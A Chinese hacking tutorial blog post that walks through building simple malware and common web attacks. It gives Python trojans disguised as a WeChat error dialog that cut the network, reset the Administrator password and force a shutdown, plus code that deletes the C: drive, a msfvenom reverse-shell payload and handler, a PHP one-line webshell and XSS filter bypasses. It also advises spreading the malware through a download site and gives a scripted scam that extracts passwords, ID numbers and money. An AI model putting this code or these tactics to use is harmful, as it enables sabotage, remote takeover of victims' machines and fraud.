主頁 >  其他 > 讓你成為白帽子黑客(中級篇)

讓你成為白帽子黑客(中級篇)

2020-10-18 21:59:51 其他


相關說明

本章所講述的所有黑客技術,均不得用于非法目的,
如果你覺得文章含有侵權部分,可以聯系CSDN私聊,我會適當修改,
未經允許,不得轉載,如需轉載,請CSDN私聊,


引子

從中級篇之后,我們的開場就不一樣啦!
換了臺新電腦,很多軟體都換了,所以我就干脆從新改一下開場白,

虛擬環境——VMware

之前的VirtualBox不用了,現在我用VMware,
安裝VMware Workstation 15 Pro:
在這里插入圖片描述
下載安裝,打開后,你應該看到是這個樣子:
在這里插入圖片描述

創建攻擊物件和攻擊機

我們需要創建幾臺計算機:
Kali(攻擊機) Windows10(用戶機) Windows7(用戶機)
暫時創建這么幾個,XP,Server等也可以安裝,之后如果用到了的話我會講,
在這里插入圖片描述
在這里插入圖片描述

在這里插入圖片描述
在這里插入圖片描述
在這里插入圖片描述
點擊完成,然后匯入iso檔案,開機即可:
在這里插入圖片描述
Windows10是微軟一個優秀的作業系統,據說也是微軟Windows系列的最后一個發行版,
Windows10比之前任何一款作業系統的綜合防御能力都要強,所以我們也要學習怎么入侵Windows10,
Windows 7作業系統也是一個比較重要的系統,XP之后,隨著UAC等防御機制的發布,系統也不弱,所以,我們也要學習攻擊,

Win7:
在這里插入圖片描述
Kali(這里我換成舊版Kali):
在這里插入圖片描述
Kali真的非常爽,我們用Kali,隨隨便便能攻擊一臺計算機,隨隨便便能攻擊一個網站,
當然,一切都是在虛擬環境下的,

Python安裝

這個我就不說了,之前文章都有,
安裝完成之后,輸入代碼來測驗:

print("Hello World")

輸出如下:

Hello World

這代表你的IDE可用,

測驗虛擬機的網路配接器

如果我們要做內網滲透,我們要將攻擊機和用戶電腦放在一個局域網內,如果我們做Web相關的滲透,我們則需要把攻擊機設為NAT模式,
在這里插入圖片描述
VMnet0是可以上網的,也可以做一些滲透,
之后我們需要根據實驗需求,修改虛擬機的網路配接器,就在設定里面設定,

查看Windows和Linux的IP地址

很多人都不會調IP,那么這里對Windows和Linux的IP地址查詢做一下講解,
Windows系統是在cmd里面調取的,
打開Windows:
在這里插入圖片描述
按下Windows + R,輸入cmd:
在這里插入圖片描述
然后在黑框中輸入ipconfig
在這里插入圖片描述
其中的IPv4地址就是我們的ip地址,
打開Kali Linux的終端:
在這里插入圖片描述
輸入ifconfig
在這里插入圖片描述
其中的eth0中的inet就是你的IP地址了,
調取IP地址是基本知識中的基本知識,一學就會,

1.制作斷網木馬

如果用戶運行木馬程式,就會斷網,就這么簡單,和原理一樣簡單,
在CMD中,斷網使用的指令是:

NET STOP SERVICE

使用Python制作木馬程式,可以用這個代碼:

import os
os.system("net stop service")

斷網木馬,通常只是一個惡作劇木馬,

2.制作彈窗木馬

為了提高彈窗木馬的真實性,我們將其偽裝成一個程式,代碼附上:

import tkinter.messagebox
import tkinter
root = tkinter.Tk()
root.title("WeChat")
root.geometry("300x300")
tkinter.messagebox.showerror("錯誤", "程式打開錯誤!")
root.destroy()

這是一個正常的程式,對電腦沒有傷害,然后我們結合一個斷網木馬,

import os
import tkinter.messagebox
import tkinter
os.system("net stop service")
root = tkinter.Tk()
root.title("WeChat")
root.geometry("300x300")
tkinter.messagebox.showerror("錯誤", "程式打開錯誤!")
root.destroy()

然后,我們彈窗,

import os
import tkinter.messagebox
import tkinter
os.system("net stop service")
root = tkinter.Tk()
root.title("WeChat")
root.geometry("300x300")
tkinter.messagebox.showerror("錯誤", "程式打開錯誤!")
root.destroy()
tkinter.messagebox.showerror("錯誤", "Windows防火墻意外關閉")
tkinter.messagebox.showerror("錯誤", "Windows木馬查殺工具意外關閉")
tkinter.messagebox.showerror("廣告", "Windows駐西安皮革廠倒閉了!")
……………………………………

3.修改密碼病毒

這個病毒可以修改電腦密碼!
首先,我們撰寫偽裝程式:

import tkinter.messagebox
import tkinter
root = tkinter.Tk()
root.title("WeChat")
root.geometry("300x300")
tkinter.messagebox.showerror("錯誤", "程式打開錯誤!")
root.destroy()

然后,我們通過CMD指令修改Administrator密碼:

import tkinter.messagebox
import tkinter
import os
os.system("NET USER Administrator 123456")
root = tkinter.Tk()
root.title("WeChat")
root.geometry("300x300")
tkinter.messagebox.showerror("錯誤", "程式打開錯誤!")
root.destroy()

修改好了密碼,然后,我們斷網:

import tkinter.messagebox
import tkinter
import os
os.system("net stop service")
os.system("NET USER Administrator 123456")
root = tkinter.Tk()
root.title("WeChat")
root.geometry("300x300")
tkinter.messagebox.showerror("錯誤", "程式打開錯誤!")
root.destroy()

病毒正在提升威力!但是如果有人一直不關機怎么辦?沒關系!

制作強制關機腳本

立刻關機的CMD命令:

shutdown -s -t 0

如果設定的是一分鐘后關機,那么:

shutdown -s -t 60

OK,通過這段代碼,我們結合上面的代碼,來開始制作!

import tkinter.messagebox
import tkinter
import os
os.system("net stop service")
os.system("NET USER Administrator 123456")
root = tkinter.Tk()
root.title("WeChat")
root.geometry("300x300")
tkinter.messagebox.showerror("錯誤", "程式打開錯誤!")
root.destroy()
os.system("shutdown -s -t 0")

我們通過一段段的學習,現在已經可以制作木馬病毒了!

正章

上一篇中,我們學習了通過Windows的高危漏洞永恒之藍入侵個人PC電腦,我們使用了msfconsole這個東西來攻擊,
本章,我們會深入學習msfconsole以及Python編程,向白帽子黑客更進一步,
本章節還會學習很多的術語與操作,希望能為你帶來幫助,

常見Web漏洞

一.SQL注入漏洞

這么來說吧,這個網站只要使用了資料庫,一般都有被SQL注入的風險,這要看網站是怎么防護的,
SQL注入漏洞原理就是通過輸入框輸入的內容和SQL陳述句來拼接而成,

<?php
...
$input = $_GET['input'];
$get = "SELECT username From users WHERE username = '$input'";
...

這個就是典型的PHP注入漏洞代碼,
SQL注入漏洞一直是網路安全漏洞中的頭等大敵,每個企業都在盡力避免,SQL注入漏洞最高的危險就是資料庫內容被獲取,個人隱私泄露,試想一下,如果一個上萬人注冊的網站被SQL注入,那么,這個網站不得賠死,

在網站上尋找SQL注入點實作注入

一般只要有輸入框和SQL陳述句是拼接的,都是SQL注入可以嘗試的注入點,那么一般的網站,都是非常大而且雜的,所以我們要嘗試在一個復雜的網站上試圖尋找注入點,
去百度上尋找一個網站去練手吧!但是千萬不要去攻擊,

SQL注入防御

其實,一個網站必須使用資料庫,只要使用了資料庫,就都有被攻擊的風險,具體的防護方法有很多,其中最為常見的就是過濾,
過濾就是將用戶輸入的危險字符通過某種轉義方式改為不危險字符,其中危險字符就包括:

select, delete, insert, update, or, where......

等等,但是之過濾這些字符還不夠,攻擊者可以通過大小寫混寫來繞過防護,所以,我們需要通過正則運算式來防護,

白名單和黑名單

設定黑白名單也是有效的防護方法,通過檢測用戶的例外行為,并拒絕該IP地址向網站服務器發送請求,
例如一個網站,用戶192.168.255.255向網站服務器發送請求,然后網站正常回應,但是用戶192.168.255.255在輸入框中連續輸入危險字符超過一定次數,那么下次192.168.255.255再向網站發送請求的時候,黑名單已經記錄了下來,然后請求被拒絕,
函式大體如下:

def defence():
    global i
    #過濾函式
    i = 0#計數器
    ......
    i += 1;
if i > 5:
    #封禁操作    

自動化軟體

目前作者知道的主要是SQLmap以及啊D工具,這兩個工具可以實作SQL注入,

二.XSS跨站腳本攻擊漏洞

曾經一度被OWASP列為最危險漏洞,XSS,跨站腳本攻擊,本質上也是一種注入攻擊,最容易受到XSS漏洞影響的大多數是一些實時通訊功能,例如留言板,在線聊天室,
為什么XSS漏洞如此受重視?因為它的危害程度不亞于SQL注入攻擊,如果一個網站存在XSS漏洞,那么攻擊者可以執行任意的Js代碼,

$input = $_GET['input'];
echo "$input";

最常見的測驗指令,就是<script>alert(1)</script>,我們現在來看一下攻擊案例,通過這個攻擊案例來看一下XSS,

攻擊案例

自己花了一點時間搭建了一個模擬某科技公司的官網,其中黑客容易攻擊的地方主要有兩處,分別是:
1.在線留言板:
在這里插入圖片描述
這個點非常可能被攻擊,重點考慮,
2.全站搜索
在這里插入圖片描述
除了剛剛的留言板,這個是唯一的互動式輸入框,雖說不打算考慮,但是我開發時沒有任何過濾,所以也有注入風險,
留言板功能,我為了模擬真正的攻擊,請了一個朋友幫我做了一個過濾,然后讓我攻擊,簡單的嘗試了一下,簡單的尖括號,script,iframe,click等都過濾了,但是,好像唯獨沒有過濾img字符,這位老兄HTML沒學好啊!嘗試攻擊,果然成功,
在這里插入圖片描述
我問了一下他,還看了一下過濾代碼,發現他是用的正則運算式,如果不用,那么以下的陳述句都是可以用的:

<scri<script>pt>alert(1)</script>
<scrIpt>alert(1)</script>
<script>alert(1)</SCript>
......

還有就是遞回,當然,這里黑白名單也是可以用的,
其實,XSS漏洞的危害,取決于黑客的Js代碼,如果一個不會編程的黑客,就算發現了XSS漏洞,那么最多彈框,

關于HTML轉義

這就很難繞過了,
不過XSS Aditor是有辦法繞過的,本人現在還在學習,

相關工具

我目前并沒有發現什么有用的黑客工具可以用來XSS,所以手工注入的能力很重要,

三.暴力破解漏洞

相信大家應該都知道列舉(又稱窮舉),那就是通過一個個試,最終得到結果,機器最適合干這個事了,所以,暴力破解漏洞由此誕生,
通過Python可以實作暴力破解,主要使用的是request模塊,這個模塊可以處理網站,當然也可以用來爬蟲,
一般來說,暴力破解漏洞存在于登入界面或者密碼界面,最簡單的例子就是管理員后臺,有登入密碼,以及常見的如“您的檔案已加密,請輸入密碼”或者“請輸入密碼查看”等,人們總是認為這種方式能夠防止資料被偷竊,但是,有暴力破解,
在這里插入圖片描述
幾乎所有網站都是用上圖的登入方式,

弱密碼

什么是弱密碼呢?123456,888888,qwerty等都是弱密碼,這些弱密碼大多數都在黑客的密碼字典中,所以,弱密碼是最容易破解的,一般黑客的弱密碼字典大多數在10-20MB,估算一下,大概有幾百萬個密碼,
弱密碼非常危險,所以,現在密碼一定不要設定成弱密碼,

暴力破解防護方法

行為驗證碼

行為驗證碼需要用戶通過驗證碼,例如滑動圖示,辨別圖片等內容,有些大型的社交平臺,如微博,有時候甚至需要兩次行為驗證,這對黑客暴力破解加大了難度,不過驗證碼也不一定安全,這就要看開發者怎么去開發了,有沒有驗證碼失效制度,
我在互聯網上找到了一個網站,所有的登入注冊都需要驗證,
注冊(雙重認證:行為認證和短信驗證碼):
在這里插入圖片描述
賬密登入:
在這里插入圖片描述
短信登入(又是雙重認證);
在這里插入圖片描述

token放爆破機制

所謂的token,其實就是一個驗證碼,只不過驗證碼用戶看不到,而是通過兩端的token驗證碼進行比對,確認無誤才能通過,
token放爆破機制其實也有繞過方式,同樣是開發者的失效機制有沒有開發好,

自動化工具

暴力破解就很多了,你們大可自己開發或尋找,

四.檔案上傳漏洞

檔案上傳是現在很多網站都具備的功能,例如說頭像上傳,資料上傳等,那么,如果一個網站具有上傳檔案的功能,攻擊者是不是就可以上傳木馬呢?
事實證明,如果網站對檔案上傳的后綴名,內容沒有做任何審核,那么木馬是可以上傳成功的,
最簡單的木馬,就是只通過一句PHP代碼來實作,簡稱PHP一句話木馬,

<?php eval(@$_POST['a']); ?>

最后通過中國菜刀拿到整個網站的框架,

怎么過濾?

開發者通過對檔案上傳內容進行檔案后綴名檢測,比如作者之前有做過一個檔案上傳漏洞檢測,就可以通過對特定的后綴名進行勘察,
例如一個功能,是上傳頭像,那么用戶肯定不會上傳一個php檔案上去,所以,我們就可以規定這類檔案可以上傳:

.jpg  .png  .gif  .bmp 

但是,這太天真了,對于黑客來說,改個后綴名豈不是簡簡單單?
于是,新的防護產品誕生了!

安全狗

安全狗可以通過相關技術,挖掘檔案內容,準確識別PHP一句話木馬,網路木馬等,但是,PHP有辦法繞過一句話,

CSRF漏洞

這個漏洞的條件比較苛刻,CSRF其實是通過一個惡意鏈接,有待用戶點擊,然后修改用戶內容,
CSRF通常出現在忘記密碼,攻擊者構造好鏈接之后,就可以修改相關資訊,這里不多做介紹,

Web小結

了解了網站的常見漏洞之后,我們就可以找網站練手了,當然,如果我們挖到了漏洞,可以提交給SRC,這樣還能掙錢!

病毒

病毒,就是黑客撰寫的計算機程式,通過這個程式,可以對用戶造成損失等,
病毒會通過Web等方式傳播,并且通常擁有自我復制能力,所以我們形象的成惡意程式為病毒,
木馬本質上也是病毒,兩者沒有太大的差異,

  • 破壞性病毒
    這種病毒的危害就是破壞你的檔案,他可能會洗掉你的所有檔案,或洗掉制定檔案,也可能例如無限打開瀏覽器,無限彈窗等,這對電腦也是有很大損害的,
    其實有些電腦,會出現一直藍屏,亦或者打不開系統等,人們往往認為這是電腦硬體出了問題,其實,也有可能是一些病毒造成的,
  • 遠控病毒
    這種病毒可以遠程控制你的電腦,你甚至都可能察覺不到你的電腦正在被監控,他們往往可以遠程下載檔案帶你的電腦上面,或者遠程修改,打開你的檔案,做鍵盤記錄等,
  • 勒索病毒
    這種病毒在運行了之后就會加密你的所有檔案,之后就要求你支付相應贖金來解密檔案,最近爆發的WannaCry病毒就是勒索病毒,之后我們也會學習分析這些病毒,
  • 其他病毒
    還有其他例如密碼盜取,惡意差評病毒等,

破壞性病毒

import webbrowser as web
web.open("www.baidu.com")

這段代碼就可以打開百度首頁,那么,我們把它改進一下,就變成了一個病毒:

import webbrowser as web
while True:
	web.open("www.baidu.com")

洗掉C盤也是一個方法,他的代碼實作如下:

import subprocess as sub
a = sub.call("del C:\ ", shell=True)

破壞一個系統就是那么簡單,一個簡單的py程式就可能對系統造成破壞,
破壞性病毒的撰寫比較簡單,我們制作的簡單的病毒程式就會造成嚴重的損失,

msf遠控木馬

在終端輸入:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=4444 -f exe > virus.exe

生成木馬病毒之后,然后生成控制端:

msfconsole
use exploit/multi/handler
set lhost 192.168.0.106
set lport 4444
exploit

最后,你會拿到meterpreter會話

meterpreter>

當你看到這個字符的時候,那就說明,你成功了,通過meterpreter可以做很多事,例如檔案上傳與下載,桌面監控,遠程攝像頭拍攝等等,

這類就是遠控木馬,這種木馬的危害是遠遠大于破壞性木馬的,

勒索病毒

勒索病毒的撰寫有一些難度,我們在這一篇中暫時不會接觸,

傳播

病毒做好了,我們要想盡一切方法來傳播病毒,
通過網站傳播是一個非常好的方法,我們可以自己制作一個網站,
如果你沒有自己開發網站的能力,沒關系,你可以使用工具——凡客建站,
這里我們不說了,我們通過撰寫代碼來制作網站,


撰寫網站可以學習PHP,JSP,ASP,HTML等等


寫一個網站,可以下載我們的惡意軟體:
在這里插入圖片描述
其實,我們也可以通過郵件或者廣告等方式來傳播我們的病毒,但是現在,我們暫時不學習,

拓展篇

大家在學習的程序中出現的問題,都可以通過百度自行解決,或者私信我,
如果你目前還無法理解這些知識,那么,請一定檢查這些原因:

  • 跳著看的,之前的東西沒有仔細看
  • 對于Python等編程不夠了解
  • 對于計算機的基本了解太低
    好了,讓我們開始學習吧!

病毒的常見特征實作

  • 自我繁殖
    自我繁殖技術是一個比較高超的學問,本章中我們只是介紹一些最簡單的繁殖技術——復制,
    如果需要通過代碼實作,那就是這樣的,
import os
os.system("copy 路徑 路徑")
  • 注冊表實作開機自啟動
    注冊表的開機自啟動就是通過編碼,將一個程式寫入注冊表,從而實作開機自啟動,
    這里我們通過C++實作,這也是一種比較重要的語言,而且Windows系統也是基于C++開發的,
    C++HelloWorld實體:
#include <iostream>
using namespace std;
int main(){
	cout << "Hello World!" << endl;
	return 0;
}

那么關于WIndows的函式,我們通過這個庫:

#include <windows.h>

好的,現在我們來了解幾個函式:

RegOpenKeyEx:打開一個指定的注冊表鍵,
RegSetValueEx:在注冊表項下設定指定值的資料和型別,回傳零表示成功,回傳其他任何值都代表一個錯誤代碼,

參考鏈接:
https://baike.baidu.com/item/RegOpenKeyEx/3716633
https://baike.baidu.com/item/RegSetValueEx/9735249
這樣,我們就能大致實作自啟動,
還有以下病毒的基本技術:

  • 資源釋放
  • 自我壓縮與解壓縮
  • 提權技術
  • 自我隱藏

推薦大家學習《Windows黑客編程技術詳解》,這篇文章具體的講解了病毒在進入了用戶電腦之后的一系列行為和編碼實作,這里筆者就不多多解釋了,

病毒小結

到這里,有關病毒的一部分就到此結束了,
其實病毒的廣闊世界還有待我們探索,我們還沒有完全了解病毒,
中國的灰鴿子,病毒,大白鯊等木馬,告別了國外木馬一統天下的局勢,我們也可以學習怎么去使用它,
打開Windows10虛擬機,在虛擬機內安裝小風黑客工具包,大家可以探索里面的工具,
在這里插入圖片描述
大家也可以下載WannaCry,熊貓燒香等木馬,自行研究,之后,在高級篇內,我會教授大家怎么反編譯和研究這些木馬病毒,

插曲:社會工程學

隨著反黑客技術的越來越強,常規的黑客攻擊手段越來越難實作,所以黑客大致就分為了兩類:繼續研究破解或繞過反病毒軟體等,但是也有不少黑客選擇了社工黑客,
社會工程學就是借助人性,主要表現在對于錢財的貪婪,對于社會的不滿等,黑客通常會通過社會工程學,去打聽到一些訊息,
所以:人才是最大的安全漏洞

社會工程學使得黑客就像是一個特工一樣,潛入秘密大樓,從而打聽訊息,
欺騙,就是社會工程學的本質,


(前期:用戶大白在某網站上注冊了一個賬號,然后有一天發現網站的提現功能失效了,于是就找到了偽裝成作業人員的黑客)
大白:搞啥玩兒,這錢怎么提不出來了?
黑客:您先別急,我來看看,
(過了5min)
黑客:你好,你的賬號好像出了點問題,
大白:啥子問題?
黑客:emmm,似乎被黑客入侵了,前幾天也是有一個這樣的用戶,
大白(傻眼了):黑客入侵?那咋辦呢?我可存了10W+元呢!
黑客:您先告訴我賬號密碼,然后我幫你看看是什么問題,
大白:用戶名:DB19990512 密碼是那么qweqwe
(過了3min)
黑客:手機已經被攻擊,你看看能不能把身份證資訊告訴我,我幫您看看聯合實名認證能不能幫您解決
大白:31020419900512375X
黑客:不好意思,你的手機已經被黑客掌控,
大白:玩了,我的錢啊!
黑客:沒關系,我可以幫你,
大白:你拿什么幫我?
黑客:你先付我5000塊錢,然后我幫您申請一個“防黑加固”,雖然錢取不出來了,但是之后錢還是可以正常存的,
大白:我的錢都沒有了,存個****,我看你***就是玩我,
黑客:已經被黑客偷走的錢是要不回來的,所以你現在只能這樣了!
大白:好吧,
(黑客賬號多了5000元)
黑客:好了,下次小心點,
大白:OK


通過上面的故事,黑客成功拿到了大白的身份證號碼,以及賬號密碼的資訊,還多掙了5000塊,這就是社會工程學的威力,

結束

好了,終于結束了,其實發現,做一個黑客還挺有意思的,
本人堅決反對學習者通過黑客技術違反法律,任何違反法律的事,都會受到法律的制裁,
如果你覺得我的文章對你有用,請在評論區留下你的鼓勵吧!哪怕——那只是一個假的祝福,你們的鼓勵,是我不斷出各類教程的不斷動力,真的,
如果不想,那就算了,希望你能在未來,勢如破竹,

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/178911.html

標籤:其他

上一篇:LJS的GCD

下一篇:精益求精!華為工程師凝聚超凡的智慧結晶:網路編程,已獻上膝蓋

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • 2023年最新微信小程式抓包教程

    01 開門見山 隔一個月發一篇文章,不過分。 首先回顧一下《微信系結手機號資料庫被脫庫事件》,我也是第一時間得知了這個訊息,然后跟蹤了整件事情的經過。下面是這起事件的相關截圖以及近日流出的一萬條資料樣本: 個人認為這件事也沒什么,還不如關注一下之前45億快遞資料查詢渠道疑似在近日復活的訊息。 訊息是 ......

    uj5u.com 2023-04-20 08:48:24 more
  • web3 產品介紹:metamask 錢包 使用最多的瀏覽器插件錢包

    Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包,它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一,它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......

    uj5u.com 2023-04-20 08:47:46 more
  • vulnhub_Earth

    前言 靶機地址->>>vulnhub_Earth 攻擊機ip:192.168.20.121 靶機ip:192.168.20.122 參考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnb ......

    uj5u.com 2023-04-20 07:46:20 more
  • 從4k到42k,軟體測驗工程師的漲薪史,給我看哭了

    清明節一過,盲猜大家已經無心上班,在數著日子準備過五一,但一想到銀行卡里的余額……瞬間心情就不美麗了。最近,2023年高校畢業生就業調查顯示,本科畢業月平均起薪為5825元。調查一出,便有很多同學表示自己又被平均了。看著這一資料,不免讓人想到前不久中國青年報的一項調查:近六成大學生認為畢業10年內會 ......

    uj5u.com 2023-04-20 07:44:00 more
  • 最新版本 Stable Diffusion 開源 AI 繪畫工具之中文自動提詞篇

    🎈 標簽生成器 由于輸入正向提示詞 prompt 和反向提示詞 negative prompt 都是使用英文,所以對學習母語的我們非常不友好 使用網址:https://tinygeeker.github.io/p/ai-prompt-generator 這個網址是為了讓大家在使用 AI 繪畫的時候 ......

    uj5u.com 2023-04-20 07:43:36 more
  • 漫談前端自動化測驗演進之路及測驗工具分析

    隨著前端技術的不斷發展和應用程式的日益復雜,前端自動化測驗也在不斷演進。隨著 Web 應用程式變得越來越復雜,自動化測驗的需求也越來越高。如今,自動化測驗已經成為 Web 應用程式開發程序中不可或缺的一部分,它們可以幫助開發人員更快地發現和修復錯誤,提高應用程式的性能和可靠性。 ......

    uj5u.com 2023-04-20 07:43:16 more
  • CANN開發實踐:4個DVPP記憶體問題的典型案例解讀

    摘要:由于DVPP媒體資料處理功能對存放輸入、輸出資料的記憶體有更高的要求(例如,記憶體首地址128位元組對齊),因此需呼叫專用的記憶體申請介面,那么本期就分享幾個關于DVPP記憶體問題的典型案例,并給出原因分析及解決方法。 本文分享自華為云社區《FAQ_DVPP記憶體問題案例》,作者:昇騰CANN。 DVPP ......

    uj5u.com 2023-04-20 07:43:03 more
  • msf學習

    msf學習 以kali自帶的msf為例 一、msf核心模塊與功能 msf模塊都放在/usr/share/metasploit-framework/modules目錄下 1、auxiliary 輔助模塊,輔助滲透(埠掃描、登錄密碼爆破、漏洞驗證等) 2、encoders 編碼器模塊,主要包含各種編碼 ......

    uj5u.com 2023-04-20 07:42:59 more
  • Halcon軟體安裝與界面簡介

    1. 下載Halcon17版本到到本地 2. 雙擊安裝包后 3. 步驟如下 1.2 Halcon軟體安裝 界面分為四大塊 1. Halcon的五個助手 1) 影像采集助手:與相機連接,設定相機引數,采集影像 2) 標定助手:九點標定或是其它的標定,生成標定檔案及內參外參,可以將像素單位轉換為長度單位 ......

    uj5u.com 2023-04-20 07:42:17 more
  • 在MacOS下使用Unity3D開發游戲

    第一次發博客,先發一下我的游戲開發環境吧。 去年2月份買了一臺MacBookPro2021 M1pro(以下簡稱mbp),這一年來一直在用mbp開發游戲。我大致分享一下我的開發工具以及使用體驗。 1、Unity 官網鏈接: https://unity.cn/releases 我一般使用的Apple ......

    uj5u.com 2023-04-20 07:40:19 more